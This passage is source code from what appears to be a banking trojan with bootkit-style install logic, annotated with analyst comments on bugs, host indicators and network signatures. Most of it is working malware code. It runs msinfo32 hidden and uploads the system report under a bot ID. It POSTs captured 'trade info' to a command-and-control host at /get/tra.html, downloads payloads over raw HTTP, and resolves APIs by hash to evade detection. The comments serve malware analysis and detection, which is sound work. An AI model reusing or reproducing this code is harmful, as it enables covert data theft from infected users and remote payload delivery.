        File::WriteBufferA(Path,&Path,sizeof(PCHAR));
        STR::Free(Pref);
        STR::Free(UID);
        STR::Free(Path);
    };
    if (BkInstalledSuccess)
    {
        DWORD thid = 0;
        PP_DPRINTF(L"ExplorerMain: starting reboot thread and reboot notify thread");
        // Thread handles are discarded (never closed).
        pCreateThread(NULL, 0, RebootThread, NULL, 0, &thid);
        pCreateThread(NULL, 0, RebootNotifyThread, NULL, 0, &thid);
    }
    PP_DPRINTF(L"ExplorerMain: finished.");
    return ret;
}
// Collects a system-information report and uploads it to the stats server.
//  - Reads DebugReportSettings (Enabled, StatPrefix, StatUrl); returns at once when disabled.
//  - Runs msinfo32.exe with ` /report "<temp file>"` and waits for it to exit. si.wShowWindow is
//    SW_HIDE, but si.dwFlags stays 0 after the memset, so STARTF_USESHOWWINDOW is not set.
//  - Packs the report into a CAB as "sysinfo.txt" and sends it via DebugReportSendSysInfo under
//    the UID generated from StatPrefix.
//  - The do { } while (false) is a single-exit cleanup pattern: both temp files are deleted and
//    freed afterwards; MsInfoParam is never freed.
// Host indicators: msinfo32.exe launched with /report into a temp file from an unexpected parent;
// a CAB uploaded to StatUrl.
void DebugReportCreateConfigReportAndSend()
{
    PCHAR MsInfoPath = NULL;
    PCHAR MsInfoParam = NULL;
    PCHAR ReportPath = NULL;
    PCHAR CabPath = NULL;
    DebugReportSettings* settings = DebugReportGetSettings();
    DBGRPTDBG("DebugReportCreateConfigReportAndSend", "Started with settings: Enabled='%d' StatPrefix='%s' StatUrl='%s'", settings->Enabled, settings->StatPrefix, settings->StatUrl );
    if (!settings->Enabled)
        return;   // NOTE(review): settings are not released on this early return
    do
    {
        // Path to msinfo32.exe
        MsInfoPath = GetPathToMsInfo32();
        DBGRPTDBG("DebugReportCreateConfigReportAndSend", "GetPathToMsInfo32() return '%s;", MsInfoPath);
        if (MsInfoPath == NULL) break;
        // Temporary file for the report
        ReportPath = File::GetTempNameA();
        DBGRPTDBG("DebugReportCreateConfigReportAndSend", "GetTempNameA() for report file return '%s;", ReportPath);
        if (ReportPath == NULL) break;
        MsInfoParam = STR::Alloc(2 * MAX_PATH);
        if (MsInfoParam == NULL) break;
        PROCESS_INFORMATION pi;
        STARTUPINFOA si;
        m_memset(&si, 0, sizeof(si));
        m_memset(&pi, 0, sizeof(pi));
        m_memset(MsInfoParam, 0, STR::Length(MsInfoParam));
        // Run hidden
        si.cb = sizeof(si);
        si.wShowWindow = SW_HIDE;
        // Command-line tail: ` /report "<ReportPath>"` (leading space: argv[0] is left empty).
        m_lstrcat(MsInfoParam, " /report \"");
        m_lstrcat(MsInfoParam, ReportPath);
        m_lstrcat(MsInfoParam, "\"");
        DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateProcess('%s', '%s')", MsInfoPath, MsInfoParam);
        BOOL process_result = (BOOL)pCreateProcessA(MsInfoPath, MsInfoParam, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
        DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateProcess return %d.(ph=0x%X pid=%d)", process_result, pi.hProcess, pi.dwProcessId);
        if (process_result == FALSE) break;
        if (pi.hProcess == NULL) break;
        if (pi.hProcess != NULL)
        {
            DBGRPTDBG("DebugReportCreateConfigReportAndSend", "Waiting for msinfo32.");
            pWaitForSingleObject(pi.hProcess, INFINITE);
            pCloseHandle(pi.hProcess);
        }
        if (pi.hThread != NULL)
            pCloseHandle(pi.hThread);
        DWORD attributes = (DWORD)pGetFileAttributesA(ReportPath);
        DBGRPTDBG("DebugReportCreateConfigReportAndSend", "'%s' attibutes 0x%X.", ReportPath, attributes);
        if (attributes == INVALID_FILE_ATTRIBUTES) break;
        CabPath = File::GetTempNameA();
        HCAB CabHandle = CreateCab(CabPath);
        DBGRPTDBG("DebugReportCreateConfigReportAndSend", "CreateCab() return 0x%X.", CabHandle);
        if (CabHandle == NULL) break;
        AddFileToCab(CabHandle, ReportPath, "sysinfo.txt");
        CloseCab(CabHandle);
        DBGRPTDBG("DebugReportCreateConfigReportAndSend", "sending sysinfo report.");
        string BotUid = GenerateUidAsString(settings->StatPrefix);
        DebugReportSendSysInfo(BotUid.t_str(), settings->StatUrl, CabPath);
        DBGRPTDBG("DebugReportCreateConfigReportAndSend", "sysinfo report sent.");
    } while (false);
    if (ReportPath != NULL) pDeleteFileA(ReportPath);
    if (CabPath != NULL) pDeleteFileA(CabPath);
    if (ReportPath != NULL) STR::Free(ReportPath);
    if (CabPath != NULL) STR::Free(CabPath);
    if (MsInfoPath != NULL) STR::Free(MsInfoPath);
    DebugReportFreeSettings(settings);
    DBGRPTDBG("DebugReportCreateConfigReportAndSend", "finished.");
}
// Uploads Buffer to the active host: POST /get/tra.html, body "id=<uid>&data=<URL-encoded Buffer>",
// plain HTTP on port 80, User-Agent taken from ObtainUserAgentString.
//  - Host is copied into a fixed 30-byte stack buffer with no length check.
//  - The script path is spelled as a char array rather than a string literal.
//  - wsprintfA is resolved by hash (0xEA3AF0D7 as written); PartReq and Header are 1024-byte buffers.
//  - Content-Length is m_lstrlen(PartReq), yet a trailing "\r\n" is appended to the body after it.
//  - The URLEncode() result (Data) is never freed; MyConnect's result is not checked before MySend.
//  - Returns false (written as `return 0`) when there is no active host.
// Network indicators: POST to /get/tra.html with "Accept: text/html", "Connection: Close" and a
// form body "id=...&data=...".
bool SendTradeInfo( char *Buffer )
{
    string Serv = GetActiveHost();
    if ( Serv.IsEmpty())
        return 0;
    char Host[30];
    m_lstrcpy( Host, Serv.t_str());
    char Script[] = {'/','g','e','t','/','t','r','a','.','h','t','m','l',0};
    char Args[] = "id=%s&data=%s";
    char Request[] = "POST %s HTTP/1.1\r\n"
                     "Host: %s\r\n"
                     "User-Agent: %s\r\n"
                     "Accept: text/html\r\n"
                     "Connection: Close\r\n"
                     "Content-Type: application/x-www-form-urlencoded\r\n"
                     "Content-Length: %d\r\n\r\n";
    char Uid[100];
    GenerateUid( Uid );
    char *Data = URLEncode( Buffer );
    char *PartReq = (char*)MemAlloc( 1024 );
    typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
    fwsprintfA _pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
    if ( PartReq == NULL )
    {
        return false;
    }
    _pwsprintfA( PartReq, Args, Uid, Data );
    char *Header = (char*)MemAlloc( 1024 );
    if ( Header == NULL )
    {
        MemFree( PartReq );
        return false;
    }
    char *UserAgent = (char*)MemAlloc( 1024 );
    DWORD dwUserSize = 1024;
    pObtainUserAgentString( 0, UserAgent, &dwUserSize );
    _pwsprintfA( Header, Request, Script, Host, UserAgent, m_lstrlen( PartReq ) );
    MemFree( UserAgent );
    // Header + body + "\r\n" + NUL.
    char *SendBuffer = (char*)MemAlloc( m_lstrlen( PartReq ) + m_lstrlen( Header ) + 1 + 2 );
    if ( SendBuffer == NULL )
    {
        MemFree( PartReq );
        MemFree( Header );
        return false;
    }
    m_lstrcpy( SendBuffer, Header );
    m_lstrcat( SendBuffer, PartReq );
    m_lstrcat( SendBuffer, "\r\n" );
    MemFree( Header );
    MemFree( PartReq );
    SOCKET Socket = MyConnect( Host, 80 );
    bool Ret = MySend( Socket, (const char *)SendBuffer, m_lstrlen( SendBuffer ) );
    pclosesocket( Socket );
    MemFree( SendBuffer );
    return Ret;
}
// Fetches Url over plain HTTP (GET) and hands the response body to the caller.
//  - ParseUrl splits Url into Host/Path/Port (Port defaults to 80). Host is freed; the Path free
//    is commented out (hedged: possibly because Path points into Url - not visible here).
//  - The request is built into a fixed 2048-byte buffer with no length check and has a fixed,
//    distinctive header layout: "Accept: */* " then CRLF and a leading space, "Accept-Language: ru ",
//    "UA-CPU: x86 ", "Accept-Encoding: gzip, deflate ", the system browser's User-Agent, and a triple
//    CRLF at the end. That exact shape is usable as a network signature.
//  - On success *lpBuffer receives the RecvAndParse buffer (caller owns it) and *dwSize its length.
//  - The socket is closed only on the RecvAndParse failure path; on the MySend failure path and on
//    success it is left open. If dwSize is NULL the received buffer leaks and false is returned.
bool AsyncDownload1( char *Url, LPBYTE *lpBuffer, LPDWORD dwSize )
{
    WSADATA wsa;
    if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
    {
        return false;
    }
    char *Host = NULL;
    char *Path = NULL;
    int Port = 80;
    if ( !ParseUrl( Url, &Host, &Path, &Port ) )
    {
        return false;
    }
    SOCKET Socket = MyConnect( Host, Port );
    if( Socket == -1 )
    {
        return false;
    }
    char *UserAgent = NULL;
    UserAgent = (char*)MemAlloc( 1024 );
    DWORD dwUserSize = 1024;
    pObtainUserAgentString( 0, UserAgent, &dwUserSize );
    char *query=(char*)MemAlloc(2048);
    m_lstrcpy(query,"GET /");
    m_lstrcat(query,Path);
    m_lstrcat(query," HTTP/1.1\r\nAccept: */* \r\n ");
    m_lstrcat(query,"Accept-Language: ru \r\n");
    m_lstrcat(query,"UA-CPU: x86 \r\n");
    m_lstrcat(query,"Accept-Encoding: gzip, deflate \r\n");
    m_lstrcat(query,"User-Agent: ");
    m_lstrcat(query,UserAgent);
    m_lstrcat(query,"\r\nHost: ");
    m_lstrcat(query,Host);
    m_lstrcat(query,"\r\nConnection: Close\r\n\r\n\r\n");
    bool b = MySend( Socket, (const char *)query, m_lstrlen( query ) );
    MemFree( Host );
    //MemFree( Path );
    MemFree( UserAgent );
    MemFree( query );
    if ( !b )
    {
        return false;
    }
    DWORD dwSizeFile = 0;
    char *Buffer = RecvAndParse( Socket, &dwSizeFile );
    if ( !Buffer )
    {
        pclosesocket( Socket );
        return false;
    }
    if ( dwSize )
    {
        *lpBuffer = (LPBYTE)Buffer;
        *dwSize = dwSizeFile;
        return true;
    }
    return false;
}